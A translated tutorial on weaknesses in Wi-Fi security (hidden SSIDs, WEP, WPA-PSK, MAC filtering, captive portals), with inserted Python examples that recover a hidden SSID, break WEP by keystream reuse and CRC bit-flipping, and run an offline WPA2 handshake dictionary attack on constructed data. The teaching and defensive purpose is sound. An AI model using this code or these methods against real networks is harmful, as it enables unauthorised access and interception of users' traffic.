by Josua M Sinambela, email: josh at gadjahmada.edu
website: http://josh.staff.ugm.ac.id
Wi-Fi networks have more weaknesses than wired networks. Wi-Fi technology is currently developing very rapidly, in line with the demand for mobile information systems. Many wireless providers, such as commercial hotspots, ISPs, internet cafes (warnet), campuses and offices, already run Wi-Fi networks, but very few pay attention to the security of data communication on those wireless networks. This attracts hackers who want to explore their abilities and carry out various illegal activities, which usually exploit Wi-Fi.
This article discusses the various activities and methods that hackers, or wireless beginners, use when wardriving. Wardriving is the activity of collecting information about Wi-Fi networks and gaining access to them. Generally the aim is to obtain an Internet connection, but it is also done out of curiosity, for experimentation, research, lab assignments, and for outright crime.
Wireless Weakness
Wireless network weaknesses can generally be divided into two types: weaknesses in the configuration and weaknesses in the type of encryption used. Configuration weaknesses arise because building a wireless network is so easy today. Many vendors provide features that make things convenient for the user or network administrator, so wireless networks are often found still running the vendor's default configuration. The author often finds installed wireless networks still using the default settings: the vendor's default SSID, IP address, remote management, DHCP enabled, channel frequency, and even no encryption and no user/password for wireless administration.
WEP (Wired Equivalent Privacy), the earlier wireless security standard, can today be easily broken with a variety of free tools available on the Internet. WPA-PSK and LEAP, which were considered the replacements for WEP, can today also be broken with an offline dictionary attack.
Some common practices for securing wireless networks, and their weaknesses, are:
1. Hiding the SSID. Many administrators hide the Service Set Identifier (SSID) of their wireless network so that only those who know the SSID can connect. This is not correct, because the SSID cannot be hidden perfectly. In particular when a client connects (association), or is forced to reconnect by a deauthentication, the client still sends the SSID in plaintext (even when encryption is in use), so anyone who intercepts the traffic can easily obtain it. Tools that can be used to obtain a hidden SSID include kismet (KisMAC), ssid_jack (airjack), aircrack, void11 and many more.
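To show exactly where a "hidden" SSID leaks, here is an added example (not code from the original article): a minimal 802.11 management-frame parser run over three constructed frames, a beacon with an empty SSID element, and the client's probe request and association request, which name the network in the clear. The BSSID, client MAC and network name are assumed values; no FCS is included.

```python
import struct

# 802.11 management frame subtypes (frame-control byte 0 with the protocol
# version bits masked off) and the fixed fields that precede the tagged IEs.
ASSOC_REQ, PROBE_REQ, BEACON = 0x00, 0x40, 0x80
FIXED_BODY_LEN = {
    ASSOC_REQ: 4,   # capability (2) + listen interval (2)
    PROBE_REQ: 0,   # information elements start immediately
    BEACON: 12,     # timestamp (8) + beacon interval (2) + capability (2)
}
SSID_IE = 0
HEADER_LEN = 24     # frame control, duration, addr1, addr2, addr3, sequence control


def mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes) -> bytes:
    """Build a minimal management frame (no FCS) for the demo capture."""
    return struct.pack("<BBH6s6s6sH", subtype, 0, 0, addr1, addr2, addr3, 0) + body


def ie(tag: int, value: bytes) -> bytes:
    """Encode one tag/length/value information element."""
    return bytes([tag, len(value)]) + value


def parse_ies(data: bytes) -> dict:
    """Walk the tagged parameters; a truncated trailing element is ignored."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies[tag] = data[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def extract_ssid(frame: bytes):
    """Return the SSID carried by a management frame, or None if the frame does
    not reveal one (SSID element absent, empty, or NUL-filled, i.e. 'hidden')."""
    subtype = frame[0] & 0xFC
    if subtype not in FIXED_BODY_LEN:
        return None                     # e.g. deauthentication: only a reason code
    body = frame[HEADER_LEN + FIXED_BODY_LEN[subtype]:]
    ssid = parse_ies(body).get(SSID_IE, b"")
    if not ssid.strip(b"\x00"):
        return None
    return ssid.decode("utf-8", errors="replace")


def recover_hidden_ssid(frames):
    """What a sniffer does: the first frame in the capture that names the network wins."""
    for frame in frames:
        ssid = extract_ssid(frame)
        if ssid:
            return ssid
    return None


# Constructed capture: the AP beacons with a hidden SSID, but the client's
# probe and association requests carry the real name in plaintext.
AP = bytes.fromhex("001122334455")          # assumed AP BSSID
CLIENT = bytes.fromhex("66778899aabb")      # assumed client MAC
BROADCAST = b"\xff" * 6
RATES = ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))

beacon_hidden = mgmt_frame(BEACON, BROADCAST, AP, AP,
                           struct.pack("<QHH", 0, 100, 0x0411) + ie(SSID_IE, b"") + RATES)
probe_req = mgmt_frame(PROBE_REQ, BROADCAST, CLIENT, BROADCAST,
                       ie(SSID_IE, b"Corp-Secret") + RATES)
assoc_req = mgmt_frame(ASSOC_REQ, AP, CLIENT, AP,
                       struct.pack("<HH", 0x0411, 10) + ie(SSID_IE, b"Corp-Secret") + RATES)

if __name__ == "__main__":
    print("beacon reveals:", extract_ssid(beacon_hidden))
    print("client traffic reveals:", recover_hidden_ssid([beacon_hidden, probe_req, assoc_req]))
```

A deauthentication frame itself carries no SSID; its role in the attack is only to force the client to re-associate so that frames like the two above are sent again while the sniffer is listening.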
2. Securing wireless only with a WEP key. WEP is the first standard encryption used to secure wireless, and it has many weaknesses, among them:
* weak keys: the RC4 algorithm used by WEP can be attacked through its key scheduling
* the WEP key is static
* the initialization vector (IV) is only 24 bits and is sent in the clear
* the message integrity check uses a Cyclic Redundancy Check (CRC-32), which is linear and not a cryptographic integrity check
WEP comes in two key sizes, 64 bits and 128 bits. In fact, the secret key of a 64-bit WEP key is only 40 bits, with the other 24 bits being the initialization vector (IV). Likewise, a 128-bit WEP key consists of a 104-bit secret key.
Attacks on WEP weaknesses include:
- Attacks on weak initialization vectors (IV), often called the FMS attack. FMS stands for the names of the three discoverers of the IV weakness: Fluhrer, Mantin, and Shamir. The attack collects as many weak IVs as possible; the more weak IVs collected, the faster the key in use is found.
- Collecting unique IVs from the captured data packets, which are then processed to crack the WEP key more quickly. This is called the chopping attack and was first described by h1kari. This technique only requires unique IVs, which reduces the number of weak IVs needed for WEP cracking.
- Both of the attacks above require many captured packets. To shorten the time, hackers usually perform traffic injection. Traffic injection is commonly done by capturing an ARP packet and replaying it to the access point; this makes collecting IVs easier and faster.
Unlike the first and second attacks, traffic injection requires specific hardware and tools that are rarely found in shops: a particular chipset, firmware version and driver version, and not infrequently the driver and application must be patched.
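The following is an added example, not code from the original article, that reproduces WEP's construction (RC4 keyed with IV||secret key, CRC-32 as the ICV) and then exercises the weaknesses listed above without the key: recovering the keystream from one frame with known plaintext, reading and forging other frames sent under the same IV, patching the encrypted CRC-32 so a bit-flipped frame still verifies, and recognising the classic FMS weak-IV pattern. The 40-bit key, the IV and the frame contents are constructed for the demo.

```python
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (KSA then PRGA), as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, in the clear) || RC4(IV||key) XOR (plaintext||ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + secret_key, len(body)))


def wep_decrypt(secret_key: bytes, frame: bytes):
    """Return (plaintext, icv_ok) for a frame produced by wep_encrypt."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + secret_key, len(ct)))
    plaintext = body[:-4]
    return plaintext, body[-4:] == icv(plaintext)


# --- attacks that need no key ------------------------------------------------

def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext (e.g. a predictable ARP request): keystream = ct XOR (pt||ICV)."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame sent under the same IV is exposed by the recovered keystream."""
    return xor(frame[3:-4], keystream)          # drop the 4 encrypted ICV bytes


def forge_with_keystream(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Encrypt a chosen plaintext under the reused IV; the AP accepts it as genuine."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, keystream[:len(body)])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """CRC-32 is linear, crc(p ^ d) = crc(p) ^ crc(d) ^ crc(0...0), so the encrypted
    ICV can be patched to match a bit-flipped ciphertext without knowing the key."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    assert len(delta) == n, "delta must cover the whole plaintext"
    return iv + xor(ct[:n], delta) + xor(ct[n:], xor(icv(delta), icv(bytes(n))))


def is_fms_weak_iv(iv: bytes, key_byte_index: int) -> bool:
    """Classic FMS weak IV (A+3, 0xFF, X): its first keystream byte leaks key byte A."""
    return iv[0] == key_byte_index + 3 and iv[1] == 0xFF


if __name__ == "__main__":
    key = bytes.fromhex("0badc0ffee")                    # constructed 40-bit secret key
    iv = bytes([0x03, 0xFF, 0x7A])                       # constructed IV, FMS-weak for key byte 0
    arp = b"ARP who-has 192.168.1.1 tell 192.168.1.23"   # predictable plaintext
    secret = b"POST /login user=admin&pw=hunter2"        # sent later under the same IV

    ks = recover_keystream(wep_encrypt(key, iv, arp), arp)
    print(decrypt_with_keystream(wep_encrypt(key, iv, secret), ks))
    print(wep_decrypt(key, forge_with_keystream(iv, ks, b"forged frame")))
    print(is_fms_weak_iv(iv, 0))
```

With only 2^24 IVs and no rule against reuse, a busy access point repeats IVs within hours, and ARP replay (the traffic injection described above) makes the access point generate fresh IV-tagged frames on demand; the keystream and bit-flipping attacks here are what a FMS/chopping-style key recovery eventually replaces with the key itself.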
3. Securing wireless only with a WPA-PSK or WPA2-PSK key. WPA security technology was created to replace WEP. There are two types of WPA: WPA Personal (WPA-PSK) and WPA-RADIUS. WPA-PSK can now be cracked with an offline brute-force attack: the attacker captures the handshake between client and access point and then tries many words from a dictionary against it. The attack succeeds if the wireless passphrase in use is indeed in the hacker's word list.
To prevent attacks on wireless security that uses WPA-PSK, use a long passphrase (a whole sentence).
The very popular tools used for this attack are CoWPAtty (http://www.churchofwifi.org/) and aircrack (http://www.aircrack-ng.org). These tools need a word list (wordlist), which can be obtained from http://wordlist.sourceforge.net/
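As an added example (not code from the original article or from the tools named above), the offline attack these tools perform, reduced to its essentials: derive the PMK from a candidate passphrase with PBKDF2, derive the key confirmation key from the handshake parameters, recompute the EAPOL MIC and compare it with the captured one. The SSID, MAC addresses, nonces and EAPOL message 2 are constructed values; the MIC form used is the WPA2/AES-CCMP one (HMAC-SHA1 truncated to 16 bytes).

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 iterations are the only thing slowing a dictionary attack down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes (the Key Confirmation Key) of PTK = PRF-512(PMK, "Pairwise key
    expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    Only the i=0 HMAC block of the PRF is needed for the KCK."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return hmac.new(pmk, b"Pairwise key expansion\x00" + data + b"\x00", hashlib.sha1).digest()[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (AES-CCMP) key MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC field
    zeroed, truncated to 16 bytes. (WPA/TKIP uses HMAC-MD5 instead.)"""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake parameters: everything a sniffer sees in messages 1 and 2
# of the four-way handshake. None of it is secret; only the passphrase is.
SSID = "hotspot-cafe"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 (121 bytes) with the 16-byte MIC field zeroed: header, descriptor
# type, key info, key length, replay counter, SNonce, IV/RSC/ID, zeroed MIC, key data.
EAPOL_MSG2 = (b"\x01\x03\x00\x75" + b"\x02\x01\x0a\x00\x10" + b"\x00" * 7 + b"\x01"
              + SNONCE + b"\x00" * (16 + 8 + 8 + 16) + b"\x00\x16" + b"\x00" * 22)


def handshake_mic(passphrase: str) -> bytes:
    """The MIC a client holding `passphrase` puts in message 2 (what the sniffer records)."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_MSG2)


def dictionary_attack(wordlist, captured_mic: bytes):
    """Offline: no further contact with the AP is needed. Each candidate costs one PBKDF2
    (4096 HMACs) plus two cheap HMACs. Returns the passphrase, or None if not in the list."""
    for candidate in wordlist:
        if hmac.compare_digest(handshake_mic(candidate), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    wordlist = ["password", "qwerty", "sunflower", "letmein"]
    print(dictionary_attack(wordlist, handshake_mic("sunflower")))
    print(dictionary_attack(wordlist, handshake_mic("kopi susu dua gelas setiap pagi")))
```

The second call returns None: a passphrase that is a whole sentence is simply not in any word list, which is the point of the advice above. Note also that the PMK depends on the SSID, so a default or very common SSID lets an attacker reuse precomputed tables across networks.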
4. MAC Filtering
Almost every wireless access point or router offers MAC filtering as a security feature. In fact this does not help much to secure wireless communication, because a MAC address is easy to spoof or even change.
Tools such as ifconfig on Linux/Unix, or various network utilities such as regedit, smac and macchange on Windows, can easily be used to spoof or change a MAC address.
The author still often finds Wi-Fi in offices and even at ISPs (usually used by cafes) protected only by MAC filtering. Using wardriving applications such as kismet/KisMAC or the aircrack tools, the MAC address of every client connected to an access point can be obtained.
After obtaining this information, we can connect to the access point using the same MAC address as that client. On a wireless network a duplicate MAC address does not cause a conflict; the client only needs a different IP address from the earlier one.
5. Captive Portal infrastructure. Captive portals were originally designed for communities that allow everyone to connect (open networks). A captive portal is actually a router or gateway machine that does not protect, or does not allow, user traffic until the user has registered or authenticated. A captive portal works as follows:
* a user with a wireless client is allowed to associate and obtain an IP address (DHCP)
* all traffic is blocked except to the captive portal (web-based registration/authentication), which sits on the wired network
* all web traffic is redirected to the captive portal
* after the user registers or logs in, access to the network (Internet) is allowed
Note that the captive portal only tracks client connections by IP and MAC address after authentication. This makes it possible to use the captive portal without authenticating, because IP and MAC addresses can be spoofed. The attack uses MAC and IP spoofing. MAC address spoofing was already described in section 4 above. IP spoofing takes more effort: by exploiting ARP cache poisoning, we can redirect the traffic of a client that has already connected.
An easier attack is a Rogue AP: an access point that we set up (usually with HostAP) using the same parameters as the target AP, from the SSID and BSSID to the frequency channel in use. When a client connects to the AP we built, we can forward its traffic to the real AP.
Not infrequently, captive portals built for hotspots have weaknesses in their network design or configuration, for example authentication still uses plaintext (http), network management can be reached over the wireless network (it sits on the same network), and many more.
Another weakness of captive portals is that data traffic, both while authenticating and after being connected to the network, is still not encrypted, so it can easily be intercepted by a hacker. Therefore, be careful when connecting to hotspot networks, and keep using secure communication protocols such as https, pop3s, ssh, imaps, etc.